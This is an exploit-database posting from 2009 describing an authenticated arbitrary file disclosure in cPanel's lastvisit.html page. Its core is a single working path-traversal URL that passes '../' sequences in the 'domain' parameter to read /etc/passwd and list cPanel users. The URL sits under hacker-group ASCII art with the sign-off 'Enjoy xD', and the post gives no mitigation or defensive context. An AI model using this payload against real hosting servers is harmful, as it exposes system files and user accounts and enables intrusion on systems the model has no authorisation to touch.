Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)

2009-06-29T00:00:00
ID 1337DAY-ID-9480
Type zdt
Reporter SecurityRules
Modified 2009-06-29T00:00:00

Description

Exploit for multiple platform in category remote exploits

                                        
                                            ====================================================================
Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)
====================================================================



+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     CPANEL USER BYPASS                                            |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: CPANEL                                                                   |
| Home...: http://CPANEL.NET                                                        |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| [+] Exploit:                                                                      |
|                                                                                   |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd 
|                                                                                   |
|                                                                                   |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] user[s]                                             |
|                                                                                   |
| [+] Enjoy xD                                                                      |             
+-----------------------------------------------------------------------------------|




#  0day.today [2018-02-21]  #